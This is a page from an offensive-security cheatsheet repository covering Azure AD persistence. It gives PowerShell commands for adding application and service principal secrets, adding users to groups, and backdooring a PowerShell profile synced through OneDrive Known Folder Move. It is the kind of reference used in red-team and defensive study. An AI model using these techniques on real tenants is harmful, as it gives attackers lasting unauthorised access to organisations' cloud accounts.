daemon-sec-cheatsheet

The cheatsheet vault for operators: AD, enumeration, exploitation, priv-esc, web, DFIR
git clone https://git.daemon-sec.xyz/daemon-sec-cheatsheet.git
Log | Files | Refs | README | LICENSE

azure-persistence.md (3204B)


      1 ---
      2 title: "Azure AD - Persistence"
      3 section: "Cloud"
      4 sectionSlug: "cloud"
      5 sourcePath: "docs/cloud/azure/azure-persistence.md"
      6 sourceUrl: "https://github.com/swisskyrepo/InternalAllTheThings/blob/203bb0c0b290/docs/cloud/azure/azure-persistence.md"
      7 sha: "203bb0c0b290"
      8 isIndex: false
      9 ---
     10 
     11 # Azure AD - Persistence
     12 
     13 ## Add Secrets to Application
     14 
     15 * Add secrets with [lutzenfried/OffensiveCloud/Add-AzADAppSecret.ps1](https://github.com/lutzenfried/OffensiveCloud/blob/main/Azure/Tools/Add-AzADAppSecret.ps1)
     16 
     17     ```powershell
     18     PS > . C:\Tools\Add-AzADAppSecret.ps1
     19     PS > Add-AzADAppSecret -GraphToken $graphtoken -Verbose
     20     ```
     21 
     22 * Use secrets to authenticate as Service Principal
     23 
     24     ```ps1
     25     PS > $password = ConvertTo-SecureString '<SECRET/PASSWORD>' -AsPlainText -Force
     26     PS > $creds = New-Object System.Management.Automation.PSCredential('<AppID>', $password)
     27     PS > Connect-AzAccount -ServicePrincipal -Credential $creds -Tenant '<TenantID>'
     28     ```
     29 
     30 ## Add Service Principal
     31 
     32 * Generate a new service principal password/secret
     33 
     34     ```ps1
     35     Import-Module Microsoft.Graph.Applications
     36     Connect-MgGraph 
     37     $servicePrincipalId = "<service-principal-id>"
     38 
     39     $params = @{
     40         passwordCredential = @{
     41             displayName = "NewCreds"
     42         }
     43     }
     44     Add-MgServicePrincipalPassword -ServicePrincipalId $servicePrincipalId -BodyParameter $params
     45     ```
     46 
     47 ## Add User to Group
     48 
     49 ```ps1
     50 Add-AzureADGroupMember -ObjectId <group_id> -RefObjectId <user_id> -Verbose
     51 ```
     52 
     53 ## PowerShell Profile Backdoor Using KFM
     54 
     55 OneDrive for Business Known Folder Move (KFM) is a feature in Microsoft OneDrive for Business that enables users and organizations to automatically redirect the contents of key Windows user folders; Desktop, Documents, and Pictures from their local PC to OneDrive.
     56 
     57 A PowerShell profile is a script file that loads whenever you start a new PowerShell session (such as opening PowerShell or Windows Terminal). Users and administrators often customize their profiles to set aliases, environment variables, functions, or pre-load modules.
     58 
     59 **Requirements**:
     60 
     61 * `Files.ReadWrite.All` privilege
     62 
     63 **Methodology**:
     64 
     65 Known Folder Move moves the user's Documents (and/or Desktop, Pictures) folder to OneDrive for Business, typically syncing:
     66 
     67 ```ps1
     68 C:\Users\<username>\Documents → C:\Users\<username>\OneDrive - <TenantName>\Documents
     69 ```
     70 
     71 This means the PowerShell profile file (`Documents\PowerShell\Microsoft.PowerShell_profile.ps1`) will now be synced to OneDrive.
     72 
     73 Push a malicious PowerShell profile at `$HOME\Documents\PowerShell\Microsoft.PowerShell_profile.ps1`.
     74 
     75 ## References
     76 
     77 * [High-Profile Cloud Privesc - Leonidas Tsaousis - July 15, 2025](https://labs.reversec.com/posts/2025/07/high-profile-cloud-privesc)
     78 * [Maintaining Azure Persistence via automation accounts - Karl Fosaaen - September 12, 2019](https://blog.netspi.com/maintaining-azure-persistence-via-automation-accounts/)
     79 * [Microsoft Graph - servicePrincipal: addPassword](https://learn.microsoft.com/en-us/graph/api/serviceprincipal-addpassword?view=graph-rest-1.0&tabs=powershell)
     80 * [Training - Attacking and Defending Azure Lab - Altered Security](https://www.alteredsecurity.com/azureadlab)